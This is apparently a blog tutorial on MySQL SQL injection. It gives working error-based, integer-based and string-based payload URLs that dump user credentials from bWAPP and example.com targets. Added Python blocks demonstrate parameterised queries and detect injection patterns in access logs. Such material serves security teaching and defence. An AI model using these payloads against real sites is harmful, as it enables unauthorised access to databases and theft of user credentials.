SQL Injection

Sampath Pendurthi
9 min read · Dec 29, 2020

Hello everyone, let's learn about SQL injection from beginner level to advanced level. First of all, learning SQL injection requires a lot of patience and a little knowledge of the SQL language. Let's begin.

SQL Injection: SQL injection is a vulnerability caused by a mistake that many programmers make: user input is pasted directly into a database query. So, basically, SQL injection is a basic attack technique used to retrieve data from the backend database by sending SQL fragments to the server, or, put another way, extracting unauthorized data by forcing the server to display it.

→ Nowadays, many companies consider SQL injection a critical vulnerability and pay very high bounties for it.

→ Many companies have been hacked because of the presence of a SQL injection vulnerability.

→ In cyberwars, SQL injection plays a very important role in retrieving admin credentials or defacing a website.

In this article, we are going to learn the types of SQL injection and how to exploit them. Basically, SQL injection is attempted wherever input parameters or login forms are present.

For example: if we are searching for something, say a kind of book in an online store, and we ask for comic books, the server will respond with results related to comics. In the backend, a SQL query is executed to perform this search and display the results. The basic query will look like this: SELECT * FROM books WHERE book LIKE '%comic%'

So now we'll understand it practically. We want to search for a movie but we don't know its name. We only know that the movie's name contains the letter 's'. Here is the website.

This is how the URL looks:

http://192.168.43.174/bWAPP/sqli_1.php?title=s&action=search

So now we know it is using the GET method to display the movie names that contain the letter 's'. We can assume the backend SQL query looks like this:

SELECT * FROM movies WHERE title LIKE '%s%'

After the above query is executed, the server displays the results taken from the database. The attacker takes advantage of this process and injects a malicious SQL fragment into the title parameter to get unauthorized data.
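To show where the weakness described above comes from, here is an added example (not code from the original article or from bWAPP) that rebuilds the movie search in Python over an in-memory SQLite table instead of MySQL: one version concatenates the title into the query text, the other binds it as a parameter, and probe() repeats the article's single-quote check against both. The table contents are constructed.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's MySQL `movies` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (id INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO movies VALUES (?, ?)",
        [(1, "Spider-Man"), (2, "Star Wars"), (3, "The Matrix")],
    )
    return db


def search_vulnerable(db, title):
    """Builds the query by string concatenation, the way the tutorial's backend
    does. Whatever the user types becomes part of the SQL text itself."""
    sql = "SELECT id, title FROM movies WHERE title LIKE '%" + title + "%'"
    return [row[1] for row in db.execute(sql)]


def search_safe(db, title):
    """Same search with a bound parameter: the driver sends the input as data,
    so quotes inside it can never change the structure of the statement."""
    sql = "SELECT id, title FROM movies WHERE title LIKE ?"
    return [row[1] for row in db.execute(sql, ("%" + title + "%",))]


def probe(search):
    """Repeats the tutorial's first check: append a single quote to the input.
    Returns 'error' when the database rejects the statement (the quote broke
    out of the string literal), otherwise the rows the search returned."""
    db = make_db()
    try:
        return search(db, "s'")
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    print("concatenated query:", probe(search_vulnerable))  # error
    print("parameterised query:", probe(search_safe))      # []
```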

Types of SQL Injections:

→Error-Based SQL Injection

→Integer Based SQL Injection

→String Based SQL Injection

→Boolean Based SQL Injection

→Blind SQL Injection

→Time Based SQL Injection

OK, now let's perform a simple SQL injection attack for each type.

Error-Based SQL Injection:

In error-based SQL injection, as the name suggests, error messages are used to extract data from the database. This technique is used when the UNION operator is filtered. There are many ways to extract data in error-based injection. Here is a practical example:

This is our target website and we want to extract data from it. First, check whether the website is vulnerable to SQL injection or not. For that we'll just add a single quote ( ' ) at the end of the id parameter.

OK, this gave us an error saying there is a syntax error, and the message also gives us some information about the backend database: it is MySQL.

Observing the error, it is a double-quoted ( " ) type. So now we can assume the backend query looks like this:

SELECT * FROM users WHERE id = "1"

To confirm that, let's add a double quote ( " ) at the end of the id parameter.

OK, there is no error, so it is confirmed that the value is double-quoted. Now let's comment out everything that follows our input in the WHERE clause.

SELECT * FROM movies WHERE id = "1"-- +"

Everything after the -- comment marker is ignored, including the application's own closing quote, so the query is now balanced. (MySQL requires a space after the two hyphens; in the URL the marker is written as --+ and the + is decoded to that space.) The next step is to find the number of columns. To find that, we use the ORDER BY clause.

For ORDER BY 6 it showed an error saying unknown column, which means there are five columns in the table. As you can observe, I've added only a single quote at the end of the id parameter so that an error is produced when the ORDER BY statement is false. Now let's find the vulnerable column. For this we would use the UNION operator, but since this is error-based it won't show any output.

As you can see, no error is produced, so I'm going to explain union-based injection under the other types. For now we'll focus on the extractvalue method, also called XPATH injection. In this method we use the extractvalue() function to extract data: it expects a valid XPath expression as its second argument, and when that argument is a string starting with a newline (0x0a) MySQL raises an XPATH syntax error whose message quotes the offending string, which is how the result of our subquery ends up on the page.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select database())))--+

An error is produced, but the name of the current database is displayed inside it. Now, to enumerate the tables present in the database, we use information_schema, the metadata database that MySQL (like most SQL databases) provides.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database())))--+

OK, this gives an error saying the subquery returns more than one row. That means more than one table is present in the database, while we can select only one row. To display all the tables in the database one by one, we use LIMIT.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() LIMIT 0,1)))--+

If we increase the offset to 1, this gives us another table present in the database.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() LIMIT 1,1)))--+

Now we use this method to find the table names present in the database. OK, I've got a table 'users' in the current database. Now we have to find the column names of that table to extract the juicy information.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(column_name) from information_schema.columns where table_name=0x7573657273 LIMIT 0,1)))--+

OK, we got a column named 'email'. (0x7573657273 in the query is the hex encoding of the string 'users', which lets us name the table without using quotes.) To find the other columns, increase the LIMIT offset as mentioned before.

OK, after increasing the value I've got the columns email, id, username, password and level. Now let's extract the data from these columns.

https://example.com/error.php?id=1' and extractvalue(0x0a,concat(0x0a,(select concat(id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email,0x3c62723e,level,0x3c62723e) from users)))--+

OK, we have successfully performed an error-based SQL injection. (0x3c62723e is the hex encoding of '<br>', used here as a separator between the fields.)

In error-based injection, if extractvalue doesn't work there are two more methods, using updatexml and a sub-query. We'll discuss them in coming articles.

Integer-Based SQL Injection:

In integer-based injection, the id parameter is an integer. If we add a single quote ( ' ) or a double quote ( " ) it will show an error. So the query looks like this:

SELECT * FROM users WHERE id=1

There is no need to add a single quote ( ' ) or double quote ( " ), and no need to balance the query. Our next step is to find the number of columns. For that we use the ORDER BY operator.

Observe the URL: I've commented out the remaining query. With ORDER BY 100 we got an error saying unknown column.

SELECT * FROM users WHERE id=1 order by 100--+

Lowering the number until the error disappears, there is no error at ORDER BY 5. So there are 5 columns in the table. Now let's find the vulnerable columns, the ones whose values are displayed on the page. For that we'll use the UNION operator.

Normally, to display the vulnerable columns we have to provide a false condition so that the original row is not returned.

For example, here I've given the input as 1 and false. If the row with id=1 exists, the first condition is true; true AND true would be true, but in our case I've added false, and true AND false is false. So the original row is not returned and the page displays the column numbers from our UNION row instead of the real data.

Now that we have a vulnerable column, we'll extract the data from the database.

http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e),3,4,5--+

So here are our database name, the database user and the version of the MySQL server. Now let's find the table names present in that database.

http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,table_name,0x3c62723e),3,4,5 from information_schema.tables where table_schema=database()--+

Now we'll find the columns present in the 'users' table.

http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,column_name,0x3c62723e),3,4,5 from information_schema.columns where table_name=0x7573657273--+

Now that we have the column names, we'll try to extract the sensitive information from the database. (0x3a3a in the next query is the hex encoding of '::', used as a field separator.)

http://example.com/index.php?id=1 and false union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a3a,password,0x3a3a,email,0x3a3a,level,0x3c62723e),3,4,5 from users--+

OK, we've got the username, password and email :) Done with integer-based.
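From the defender's side, the payloads in the error-based and integer-based sections above leave recognisable traces in web server access logs. This added example (not part of the original article) scans constructed Apache-style log lines for those shapes, URL-decodes the query string, and decodes the 0x hex literals the payloads use so an analyst can see what they name; the log lines, client addresses and hostnames are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache common format). The second and
# third carry the same payload shapes the tutorial's error.php and index.php
# URLs use, percent-encoded as a browser would send them.
LOG_LINES = [
    '10.0.0.5 - - [29/Dec/2020:10:00:01 +0000] "GET /bWAPP/sqli_1.php?title=s&action=search HTTP/1.1" 200 512',
    '10.0.0.7 - - [29/Dec/2020:10:00:09 +0000] "GET /error.php?id=1%27%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20LIMIT%200,1)))--%2B%2B HTTP/1.1" 500 233',
    '10.0.0.7 - - [29/Dec/2020:10:00:15 +0000] "GET /index.php?id=1%20and%20false%20union%20all%20select%201,group_concat(0x3c62723e,table_name,0x3c62723e),3,4,5%20from%20information_schema.tables HTTP/1.1" 200 980',
]

# Indicator patterns derived from the payload shapes shown in the tutorial.
INDICATORS = {
    "error_based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "union_based": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "comment_tail": re.compile(r"--\s*\+|--\s+|#\s*$"),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP')


def decode_hex_literals(text):
    """Map each MySQL 0x.. literal to the string it encodes, e.g. 0x7573657273 -> 'users'."""
    decoded = {}
    for hexdigits in HEX_LITERAL.findall(text):
        try:
            decoded["0x" + hexdigits] = bytes.fromhex(hexdigits).decode("ascii")
        except ValueError:  # odd length or non-ASCII bytes: not a text literal
            pass
    return decoded


def analyze(line):
    """Return the request path, the indicator names that fired on the decoded
    query string, and the hex literals found, or None for a non-request line."""
    match = REQUEST_LINE.search(line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    decoded = unquote_plus(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"path": path, "hits": hits, "hex": decode_hex_literals(decoded)}


if __name__ == "__main__":
    for entry in LOG_LINES:
        print(analyze(entry))
```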

String-Based SQL Injection:

Now let's focus on string-based injection. In string-based injection the id parameter is placed between single quotes ( ' ), double quotes ( " ) or brackets ( ( ) ).

For example, the query may take any of these forms:

SELECT * FROM users WHERE id = '1'

SELECT * FROM users WHERE id = "1"

SELECT * FROM users WHERE id = ('1')

SELECT * FROM users WHERE id = ("1")

So in string-based injection we have to balance the query in order to inject. First let's find out what kind of string it is: double-quoted ( " ), single-quoted ( ' ) or placed between brackets.

Look at the input parameter: it says id=1, but we don't know whether the value is placed between single quotes or double quotes. To find out, we have to produce an error.

I've added a single quote ( ' ) and the error shows "1"', which means the value is placed between double quotes. So now let's balance the query by adding a double quote and commenting out the remaining part.

Now let's find out the number of columns.

So we have 5 columns. To understand why I've used a single quote here, refer back to the error-based section. Now let's extract the data as described under integer-based injection.

The remaining types, boolean-based, blind and time-based, will be covered in the next article.

Boolean-based injection is nothing but using true or false statements to produce errors. Blind injection is similar, but in blind we don't know anything about the number of columns, the backend database, the database name, etc. In blind injection we have to depend on the responses produced by the server.

These will be covered in the next article.

THANK YOU…..:)

Follow For more Stuff Like This….

Instagram:https://www.instagram.com/sampath.pendurthi/

LinkedIN:linkedin.com/in/sampath-pendurthi-1313a3184/

Github:https://github.com/LetMeHackYou/

Happy Hacking …..

PEACE…..✌️✌️
